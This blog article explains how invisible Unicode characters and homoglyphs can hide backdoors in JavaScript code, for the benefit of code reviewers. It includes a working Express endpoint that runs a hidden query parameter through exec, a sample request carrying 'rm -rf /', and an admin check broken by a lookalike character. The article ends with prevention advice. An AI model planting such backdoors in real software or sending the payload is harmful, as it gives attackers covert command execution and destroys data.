Backdoor in JavaScript Applications through Invisible Character Attacks and Homoglyph Attacks

Backdoor in JavaScript Applications through Invisible Character Attacks and Homoglyph Attacks

Daily short news for you
  • Gemini 2.5 has just been released, everyone. This is the most advanced model from Google to date, with top-notch reasoning and coding capabilities - as they introduce it.

    Everyone, take a look at the benchmark table; the metrics are all superior to the other competitors. We don't know the price yet, but you can try it for free in Google AI Studio. I guess we’ll wait for it to be integrated into Cursor to see how its coding abilities measure up 😁

    » Read more
  • Since the feature to suggest search phrases appeared below the search bar, many people have been clicking on it, everyone. The search volume for other phrases has also increased many times compared to before.

    However, alongside that, the blog is now facing an issue with search "spam." There is someone mischievously filling in random links into the box, which wouldn't be a big deal if I hadn't added AI to that search box; each query costs a certain amount of tokens. It's truly destructive 💀

    » Read more
  • Now it's time for the MCP race. Everyone is racing to launch MCP servers for their services. It's only logical because no one wants to be left behind 😅.

    Recently, there is mcp-server-cloudflare and @hyperdrive-eng/mcp-nodejs-debugger.

    » Read more

Problem

A backdoor is a method to bypass regular authentication or create a "secret entrance" to remotely access a software system without typical authentication. Backdoors attempt to avoid detection through common monitoring methods like code reviews, logging, etc. Imagine being responsible for developing an API system and cleverly creating an endpoint that no one knows about except you, allowing you to easily steal user information.

Because of this, backdoors can cause serious damage to a system due to their "hidden" nature and difficulty to detect. No one knows if a backdoor exists in their system, whether it is stealing or modifying data. In summary, creating an undetectable backdoor is not easy, but once it bypasses detection, the damage is unimaginable.

As a code writer, you may unintentionally or intentionally create a backdoor in the application you are developing using some "extremely clever" techniques that I am going to describe below. Of course, if you are a code reviewer, you should also be aware of these practices to "expose" these highly condemnable actions.

Invisible Character Attacks

The character "ㅤ" (equivalent to 0x3164 in hexadecimal) is called "HANGUL FILLER". At first glance, it looks like a harmless space or whitespace, hence it is called an "invisible" character. But in reality, this character is considered a letter, so it can be used to name a variable in JavaScript.

const ㅤ = "hello world";
console.log(ㅤ); // hello world

Taking advantage of this property, it can be cleverly used in cases like the following.

const express = require("express");
const util = require("util");
const exec = util.promisify(require("child_process").exec);

const app = express();

app.get("/network_health", async (req, res) => {
  const { timeout, ㅤ } = req.query;
  const checkCommands = [
    "ping -c 1 google.com",  
    "curl -s http://example.com/",ㅤ
  ];

  try {
    await Promise.all(
      checkCommands.map(
        (cmd) => cmd && exec(cmd, { timeout: +timeout || 5_000 })
      )
    );
    res.status(200);
    res.send("ok");
  } catch (e) {
    res.status(500);
    res.send("failed");
  }
});

app.listen(8080);

At first glance, this is an API with only one endpoint, /network_health. When called, it executes 2 commands ping and curl. Take a moment to see if you can spot anything unusual in the code snippet above.

Look at line 8:

const { timeout, ㅤ } = req.query;

It seems that there is something after the timeout variable. Yes, it is the "HANGUL FILLER" character. This means that the attacker is trying to declare a variable as the "HANGUL FILLER" character.

Continuing to line 11. After the comma at the end of the line, it appears to end, but in fact, there is the declared "HANGUL FILLER" variable. So if there is an "HANGUL FILLER" attribute in req.query, that command will be executed.

A query to the endpoint with the backdoor might look like this:

GET - /network_health?%E3%85%A4%3Drm%20-rf%20%2F

In a more readable form, it is equivalent to:

GET - /network_health?ㅤ = rm -rf /

This means that the command rm -rf / is executed, which will delete the entire server.

Homoglyph Attacks

Homoglyph Attacks are a type of attack that uses Unicode characters that closely resemble operators. This causes confusion about a logical operation that may seem normal but is actually not.

const [ENV_PROD, ENV_DEV] = ["PRODUCTION", "DEVELOPMENT"];

const environment = "PRODUCTION";

function isUserAdmin(user) {
  if ((environmentǃ=ENV_PROD)) {
    return true;
  }

  return false;
}

The isUserAdmin function checks whether a user is an admin or not based on the environment variable environment. If environment is not "PRODUCTION", then everyone is assumed to be an admin.

The idea is there, but look at line 6.

if ((environmentǃ=ENV_PROD)) {

In reality, the character "ǃ" is not the "!" symbol in the logical expression, but it is a Unicode character that closely resembles the "interrobang" symbol. Therefore, the expression in this if statement is no longer a logical operation, but an assignment environmentǃ = ENV_PROD. Thus, if is always true, and all users, regardless of the environment, are considered admins.

There are many other characters that resemble characters used in the code that can be used similarly to the above case. For example: "/", "−", "+", "⩵", "❨", "⫽", "꓿", "∗". Unicode calls these characters "confusables".

How to Prevent?

Using Unicode to create backdoors is not a new idea. However, these tricks are compact, confusing, and flawed. That's why you need to be aware of their existence to increase vigilance.

You should keep these tricks in mind when performing code reviews for unknown or untrusted contributors. This is particularly relevant for open-source projects as they are often contributed to by "completely unknown" developers.

If possible, only use characters in the ASCII character set. Many development teams choose English as their primary development language. Set up tools to warn against code that doesn't adhere to the rules to limit these types of attacks.

VSCode has released a feature in the 1.63 update that highlights invisible characters and confusing characters: https://code.visualstudio.com/updates/v1_63#_unicode-highlighting.

Unicode is also forming a task force to investigate source code spoofing issues: http://blog.unicode.org/2022/03/avoiding-source-code-spoofing.html.

References:

Premium
Hello

5 profound lessons

Every product comes with stories. The success of others is an inspiration for many to follow. 5 lessons learned have changed me forever. How about you? Click now!

Every product comes with stories. The success of others is an inspiration for many to follow. 5 lessons learned have changed me forever. How about you? Click now!

View all

Subscribe to receive new article notifications

or
* The summary newsletter is sent every 1-2 weeks, cancel anytime.

Comments (0)

Leave a comment...